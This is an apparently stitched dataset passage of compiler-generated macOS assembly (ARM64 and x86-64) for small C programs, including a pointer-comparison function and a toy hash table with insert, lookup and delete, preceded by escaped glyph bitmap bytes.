@\177\370\000@\000@\000\000\000\000\000\000~\bB\bB\bB\bA\b@\360\000\000\000\000\000\000\037\360\"\bD\bD\bD\bD\bD\b\003\360\000\000\000\000\000\000@\000@\030@`A\200F\000X\000`\000\000\000\000\000\000\360=\bF\bB\bC\bC\bE\2108\360\000\000\000\000?\000@\210@\210@\210@\210@\210A\020?\340\000\000\000\000\000\000\000\000\006\030\006\030\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\0062\006<\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\300\000\300\001 \001 \002\020\002\020\004\b\000\000\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\000\004\b\002\020\002\020\001 \001 \000\300\000\300\000\000\000\000\000\000\000\000p\000@\000@\000@\310A\000B\000$\000\030\000\000\000\000\000\017\300\020 \020G\210HHP((H\037\340\000 \000\030\000\340\007@8@@@8@\007@\000\340\000\030\000\000\000\000\177\370B\bB\bB\bB\bB\bC\b<\360\000\000\000\000\037\340 \020@\b@\b@\b@\b@\b`\b\000\000\000\000\177\370@\b@\b@\b@\b@\b \020\037\340\000\000\000\000\000\000\177\370B\bB\bB\bB\bB\b@\b\000\000\000\000\000\000\177\370B\000B\000B\000B\000B\000@\000\000\000\000\000\037\340 \020@\b@\b@\b@\b@\b`\370\000\000\000\000\177\370\002\000\002\000\002\000\002\000\002\000\002\000\177\370\000\000\000\000@\b@\b@\b\177\370@\b@\b@\b\000\000\000\000\000\000\000\000\000\b@\b@\b@\b@\b\177\360\000\000\000\000\000\000\177\370\003\000\004\200\b@\020 \020@\b\000\000\000\000\000\000\000\000\177\370\000\b\000\b\000\b\000\b\000\b\000\b\000\000\000\000\177\370`\000\034\000\003\200\003\200\034\000`\000\177\370\000\000\000\000\000\000\177\3700\000\f\000\003\000\000\300\0000\177\370\000\000\000\000\037\340 \020@\b@\b@\b@\b \020\037\340\000\000\000\000\000\000\177\370A\000A\000A\000A\000B\000<\000\000\000\000\000\037\340 \020@\b@\b@\b@\f \024\037\346\000\002\000\000\177\370A\000A\000A\000A\300> \000\030\000\000\000\000\000\0008\030D\bD\bB\bB\bB\bA\b`\360\000\000@\000@\000@\000@\000\177\370@\000@\000@\000@\000\000\000\000\000\177\360\000\b\000\b\000\b\000\b\000\b\000\b\177\360\000\000`\000\034\000\003\200\000p\000\b\000p\003\200\034\000`\000\000\000p\000\017\300\0008\000\340\007\000\017\000\000\340\0008\017\300p\000\000\000\000\030` \030\300\005\000\007\000\b\3000 @\030\000\000`\000\020\000\f\000\002\000\001\370\002\000\f\000\020\000`\000\000\000\000\000@\030@(@\310A\bB\bL\bP\b`\b\000\000\000\000\000\000\000\000\177\376@\002@\002@\002@\002\000\000\000\000\000\000\000\000@\0000\000\f\000\003\200\000`\000\030\000\006\000\000\000\000\000\000@\002@\002@\002@\002\177\376\000\000\000\000\000\000\000\300\003\000\f\0000\000\f\000\003\000\000\300\000\000\000\000\000\000\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\000\000\000\000\000@\000 \000\000\000\000\000\000\000\000\000\000\000\000\000\f0\bH\b\210\b\210\b\210\b\220\007\370\000\b\000\000\000\000\177\370\004\020\b\b\b\b\b\b\b\b\004\020\003\340\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\b\b\b\b\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\004\020\177\370\000\000\000\000\003\340\004\220\b\210\b\210\b\210\b\210\b\210\007\210\000\000\000\000\004\000\004\000\037\370$\000D\000D\000D\000D\000\000\000\000\000\003\300\004\"\b\022\b\022\b\022\b\022\004$\017\370\000\000\000\000\177\370\004\000\b\000\b\000\b\000\b\000\007\370\000\000\000\000\000\000\b\000\b\000\b\000\b\000O\370\000\000\000\000\000\000\000\000\000\000\000\002\b\002\b\002\b\002\b\002O\374\000\000\000\000\000\000\000\000\000\000\177\370\000\200\001\200\002@\004 \b\020\000\b\000\000\000\000\000\000@\000@\000@\000\177\370\000\000\000\000\000\000\000\000\017\370\004\000\b\000\b\000\007\370\004\000\b\000\b\000\007\370\000\000\000\000\017\370\004\000\b\000\b\000\b\000\b\000\007\370\000\000\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\004\020\003\340\000\000\000\000\017\376\004 \b\020\b\020\b\020\b\020\004 \003\340\000\000\000\000\003\340\004 \b\020\b\020\b\020\b\020\004 \017\376\000\000\000\000\000\000\017\370\004\000\b\000\b\000\b\000\b\000\016\000\000\000\000\000\006\030\t\b\t\b\b\210\b\210\b\210\bp\000\000\000\000\000\000\b\000\b\000?\360\b\b\b\b\b\b\b\b\b\b\000\000\000\000\017\360\000\b\000\b\000\b\000\b\000\b\000\020\017\370\000\000\b\000\006\000\001\300\0000\000\b\0000\001\300\006\000\b\000\000\000\016\000\001\340\000\030\000\340\007\000\007\000\000\340\000\030\003\340\f\000\b\b\004\020\002 \001\300\001@\002 \004\020\b\b\000\000\000\000\000\000\f\002\003\002\000\202\000d\000\030\000\340\003\000\f\000\000\000\000\000\b\030\b(\bH\b\210\t\b\n\b\f\b\b\b\000\000\000\000\000\000\001\000\017\340>\374@\002@\002@\002\000\000\000\000\000\000\000\000\000\000\000\000\177\376\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\002@\002@\002>\374\017\340\001\000\000\000\000\000\000\000\000\200\001\000\001\000\000\200\000\200\000@\000@\000\200\000\000\177\360@\020@\020\177\360"
.space 12
.subsections_via_symbols
| the_stack_data/29437.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func ; -- Begin function func
.p2align 2
_func: ; @func
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
add x9, sp, #44
mov w8, #10
str w8, [sp, #44]
add x8, sp, #40
mov w10, #20
str w10, [sp, #40]
str x9, [sp, #32]
str x8, [sp, #24]
ldr w8, [sp, #44]
ldr w9, [sp, #40]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
add x8, sp, #24
str x8, [sp, #16]
b LBB0_3
LBB0_2:
add x8, sp, #32
str x8, [sp, #16]
b LBB0_3
LBB0_3:
ldr x8, [sp, #16]
ldr x8, [x8]
str x8, [sp, #8]
ldr x8, [sp, #8]
ldr w8, [x8]
str w8, [sp, #4]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _func ## -- Begin function func
.p2align 4, 0x90
_func: ## @func
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $10, -4(%rbp)
movl $20, -8(%rbp)
leaq -4(%rbp), %rax
movq %rax, -16(%rbp)
leaq -8(%rbp), %rax
movq %rax, -24(%rbp)
movl -4(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB0_2
## %bb.1:
leaq -24(%rbp), %rax
movq %rax, -32(%rbp)
jmp LBB0_3
LBB0_2:
leaq -16(%rbp), %rax
movq %rax, -32(%rbp)
LBB0_3:
movq -32(%rbp), %rax
movq (%rax), %rax
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
movl (%rax), %eax
movl %eax, -44(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/28262894.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _hash ; -- Begin function hash
.p2align 2
_hash: ; @hash
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x0, [x29, #-8]
mov x1, #256
bl _strnlen
mov x8, x0
stur w8, [x29, #-12]
str wzr, [sp, #16]
str wzr, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #12]
ldrsb w9, [x8, x9]
ldr w8, [sp, #16]
add w8, w8, w9
str w8, [sp, #16]
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #12]
ldrsb w9, [x9, x10]
mul w8, w8, w9
mov w10, #10
udiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
str w8, [sp, #16]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_4:
ldr w0, [sp, #16]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _init_hash_table ; -- Begin function init_hash_table
.p2align 2
_init_hash_table: ; @init_hash_table
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str wzr, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB1_4
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldrsw x10, [sp, #12]
adrp x9, _hash_table@GOTPAGE
ldr x9, [x9, _hash_table@GOTPAGEOFF]
mov x8, #0
str x8, [x9, x10, lsl #3]
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB1_1
LBB1_4:
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _print_table ; -- Begin function print_table
.p2align 2
_print_table: ; @print_table
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _hash_table@GOTPAGE
ldr x8, [x8, _hash_table@GOTPAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
stur wzr, [x29, #-4]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-4]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB2_10
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldursw x9, [x29, #-4]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_4
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB2_8
LBB2_4: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldursw x9, [x29, #-4]
ldr x8, [x8, x9, lsl #3]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_1 Depth=1
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB2_7
LBB2_6: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldur w9, [x29, #-4]
; implicit-def: $x10
mov x10, x9
ldursw x9, [x29, #-4]
ldr x8, [x8, x9, lsl #3]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB2_7
LBB2_7: ; in Loop: Header=BB2_1 Depth=1
b LBB2_8
LBB2_8: ; in Loop: Header=BB2_1 Depth=1
b LBB2_9
LBB2_9: ; in Loop: Header=BB2_1 Depth=1
ldur w8, [x29, #-4]
add w8, w8, #1
stur w8, [x29, #-4]
b LBB2_1
LBB2_10:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _hash_table_insert ; -- Begin function hash_table_insert
.p2align 2
_hash_table_insert: ; @hash_table_insert
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _hash_table@GOTPAGE
ldr x8, [x8, _hash_table@GOTPAGEOFF]
str x8, [sp, #8] ; 8-byte Folded Spill
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _hash
stur w0, [x29, #-20]
str wzr, [sp, #24]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB3_7
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w9, [sp, #24]
ldur w10, [x29, #-20]
add w9, w9, w10
mov w11, #10
sdiv w10, w9, w11
mul w10, w10, w11
subs w9, w9, w10
str w9, [sp, #20]
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_4
b LBB3_3
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB3_5
b LBB3_4
LBB3_4:
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldrsw x10, [sp, #20]
str x8, [x9, x10, lsl #3]
mov w8, #1
and w8, w8, #0x1
and w8, w8, #0x1
sturb w8, [x29, #-1]
b LBB3_8
LBB3_5: ; in Loop: Header=BB3_1 Depth=1
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB3_1
LBB3_7:
mov w8, #0
and w8, w8, #0x1
and w8, w8, #0x1
sturb w8, [x29, #-1]
b LBB3_8
LBB3_8:
ldurb w8, [x29, #-1]
and w0, w8, #0x1
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _hash_table_lookup ; -- Begin function hash_table_lookup
.p2align 2
_hash_table_lookup: ; @hash_table_lookup
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _hash_table@GOTPAGE
ldr x8, [x8, _hash_table@GOTPAGEOFF]
str x8, [sp, #8] ; 8-byte Folded Spill
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _hash
stur w0, [x29, #-20]
str wzr, [sp, #24]
b LBB4_1
LBB4_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB4_10
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr w9, [sp, #24]
ldur w10, [x29, #-20]
add w9, w9, w10
mov w11, #10
sdiv w10, w9, w11
mul w10, w10, w11
subs w9, w9, w10
str w9, [sp, #20]
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_4
b LBB4_3
LBB4_3:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB4_11
LBB4_4: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB4_6
b LBB4_5
LBB4_5: ; in Loop: Header=BB4_1 Depth=1
b LBB4_9
LBB4_6: ; in Loop: Header=BB4_1 Depth=1
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x0, [x8, x9, lsl #3]
ldur x1, [x29, #-16]
mov x2, #10
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB4_8
b LBB4_7
LBB4_7:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-8]
b LBB4_11
LBB4_8: ; in Loop: Header=BB4_1 Depth=1
b LBB4_9
LBB4_9: ; in Loop: Header=BB4_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB4_1
LBB4_10:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB4_11
LBB4_11:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _hash_table_delete ; -- Begin function hash_table_delete
.p2align 2
_hash_table_delete: ; @hash_table_delete
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _hash_table@GOTPAGE
ldr x8, [x8, _hash_table@GOTPAGEOFF]
str x8, [sp] ; 8-byte Folded Spill
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _hash
stur w0, [x29, #-20]
str wzr, [sp, #24]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB5_10
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp] ; 8-byte Folded Reload
ldr w9, [sp, #24]
ldur w10, [x29, #-20]
add w9, w9, w10
mov w11, #10
sdiv w10, w9, w11
mul w10, w10, w11
subs w9, w9, w10
str w9, [sp, #20]
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB5_4
b LBB5_3
LBB5_3:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB5_11
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x8, [x8, x9, lsl #3]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB5_6
b LBB5_5
LBB5_5: ; in Loop: Header=BB5_1 Depth=1
b LBB5_9
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp] ; 8-byte Folded Reload
ldrsw x9, [sp, #20]
ldr x0, [x8, x9, lsl #3]
ldur x1, [x29, #-16]
mov x2, #10
bl _strncmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB5_8
b LBB5_7
LBB5_7:
ldr x9, [sp] ; 8-byte Folded Reload
ldrsw x8, [sp, #20]
ldr x8, [x9, x8, lsl #3]
str x8, [sp, #8]
ldrsw x10, [sp, #20]
mov x8, #1048575
str x8, [x9, x10, lsl #3]
ldr x8, [sp, #8]
stur x8, [x29, #-8]
b LBB5_11
LBB5_8: ; in Loop: Header=BB5_1 Depth=1
b LBB5_9
LBB5_9: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB5_1
LBB5_10:
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
b LBB5_11
LBB5_11:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2512
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #160]
bl _init_hash_table
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
str x0, [sp, #144] ; 8-byte Folded Spill
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _printf
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
adrp x0, l_.str.16@PAGE
add x0, x0, l_.str.16@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.17@PAGE
add x0, x0, l_.str.17@PAGEOFF
bl _printf
adrp x0, l_.str.20@PAGE
add x0, x0, l_.str.20@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _printf
adrp x0, l_.str.22@PAGE
add x0, x0, l_.str.22@PAGEOFF
bl _hash
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.21@PAGE
add x0, x0, l_.str.21@PAGEOFF
bl _printf
add x0, sp, #2244
str x0, [sp, #72] ; 8-byte Folded Spill
mov x1, #260
str x1, [sp, #56] ; 8-byte Folded Spill
bl _bzero
ldr x2, [sp, #56] ; 8-byte Folded Reload
mov w8, #87
strb w8, [sp, #2244]
mov w8, #97
str w8, [sp, #40] ; 4-byte Folded Spill
strb w8, [sp, #2245]
mov w8, #108
str w8, [sp, #48] ; 4-byte Folded Spill
strb w8, [sp, #2246]
mov w8, #116
strb w8, [sp, #2247]
mov w8, #26
str w8, [sp, #2500]
add x0, sp, #1984
str x0, [sp, #80] ; 8-byte Folded Spill
adrp x1, l___const.main.Skyler@PAGE
add x1, x1, l___const.main.Skyler@PAGEOFF
bl _memcpy
ldr x1, [sp, #56] ; 8-byte Folded Reload
add x0, sp, #1724
str x0, [sp, #88] ; 8-byte Folded Spill
bl _bzero
ldr w9, [sp, #40] ; 4-byte Folded Reload
ldr w8, [sp, #48] ; 4-byte Folded Reload
ldr x1, [sp, #56] ; 8-byte Folded Reload
mov w10, #83
strb w10, [sp, #1724]
strb w9, [sp, #1725]
mov w9, #117
strb w9, [sp, #1726]
strb w8, [sp, #1727]
mov w8, #28
str w8, [sp, #1980]
add x0, sp, #1464
str x0, [sp, #96] ; 8-byte Folded Spill
bl _bzero
ldr x1, [sp, #56] ; 8-byte Folded Reload
mov w8, #77
str w8, [sp, #36] ; 4-byte Folded Spill
strb w8, [sp, #1464]
mov w8, #105
strb w8, [sp, #1465]
mov w8, #107
str w8, [sp, #32] ; 4-byte Folded Spill
strb w8, [sp, #1466]
mov w8, #101
strb w8, [sp, #1467]
mov w8, #29
str w8, [sp, #1720]
add x0, sp, #1204
str x0, [sp, #104] ; 8-byte Folded Spill
bl _bzero
ldr w8, [sp, #32] ; 4-byte Folded Reload
ldr w9, [sp, #40] ; 4-byte Folded Reload
ldr x1, [sp, #56] ; 8-byte Folded Reload
mov w10, #72
str w10, [sp, #44] ; 4-byte Folded Spill
strb w10, [sp, #1204]
strb w9, [sp, #1205]
mov w9, #110
strb w9, [sp, #1206]
strb w8, [sp, #1207]
mov w8, #30
str w8, [sp, #1460]
add x0, sp, #944
str x0, [sp, #112] ; 8-byte Folded Spill
bl _bzero
ldr w9, [sp, #36] ; 4-byte Folded Reload
ldr w8, [sp, #40] ; 4-byte Folded Reload
ldr x1, [sp, #56] ; 8-byte Folded Reload
strb w9, [sp, #944]
strb w8, [sp, #945]
mov w8, #114
strb w8, [sp, #946]
mov w8, #121
str w8, [sp, #52] ; 4-byte Folded Spill
strb w8, [sp, #947]
mov w8, #31
str w8, [sp, #1200]
add x0, sp, #684
str x0, [sp, #120] ; 8-byte Folded Spill
bl _bzero
ldr w10, [sp, #44] ; 4-byte Folded Reload
ldr w9, [sp, #48] ; 4-byte Folded Reload
ldr w8, [sp, #52] ; 4-byte Folded Reload
ldr x2, [sp, #56] ; 8-byte Folded Reload
strb w10, [sp, #684]
mov w10, #111
str w10, [sp, #68] ; 4-byte Folded Spill
strb w10, [sp, #685]
strb w9, [sp, #686]
strb w8, [sp, #687]
mov w8, #32
str w8, [sp, #940]
add x0, sp, #424
str x0, [sp, #128] ; 8-byte Folded Spill
adrp x1, l___const.main.Jessie@PAGE
add x1, x1, l___const.main.Jessie@PAGEOFF
bl _memcpy
ldr x1, [sp, #56] ; 8-byte Folded Reload
add x0, sp, #164
str x0, [sp, #136] ; 8-byte Folded Spill
bl _bzero
ldr w8, [sp, #68] ; 4-byte Folded Reload
ldr x0, [sp, #72] ; 8-byte Folded Reload
mov w9, #84
strb w9, [sp, #164]
strb w8, [sp, #165]
mov w8, #100
strb w8, [sp, #166]
strb w8, [sp, #167]
mov w8, #34
str w8, [sp, #420]
bl _hash_table_insert
ldr x0, [sp, #80] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #88] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #96] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #104] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #112] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #120] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #128] ; 8-byte Folded Reload
bl _hash_table_insert
ldr x0, [sp, #136] ; 8-byte Folded Reload
bl _hash_table_insert
bl _print_table
ldr x0, [sp, #144] ; 8-byte Folded Reload
bl _hash_table_lookup
str x0, [sp, #152]
ldr x8, [sp, #152]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_2
b LBB6_1
LBB6_1:
ldr x8, [sp, #152]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB6_3
b LBB6_2
LBB6_2:
adrp x0, l_.str.23@PAGE
add x0, x0, l_.str.23@PAGEOFF
bl _printf
b LBB6_4
LBB6_3:
ldr x10, [sp, #152]
ldr x8, [sp, #152]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.24@PAGE
add x0, x0, l_.str.24@PAGEOFF
bl _printf
b LBB6_4
LBB6_4:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
str x0, [sp, #24] ; 8-byte Folded Spill
bl _hash_table_delete
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _hash_table_lookup
str x0, [sp, #152]
ldr x8, [sp, #152]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_6
b LBB6_5
LBB6_5:
ldr x8, [sp, #152]
mov x9, #1048575
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB6_7
b LBB6_6
LBB6_6:
adrp x0, l_.str.23@PAGE
add x0, x0, l_.str.23@PAGEOFF
bl _printf
b LBB6_8
LBB6_7:
ldr x10, [sp, #152]
ldr x8, [sp, #152]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.24@PAGE
add x0, x0, l_.str.24@PAGEOFF
bl _printf
b LBB6_8
LBB6_8:
bl _print_table
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
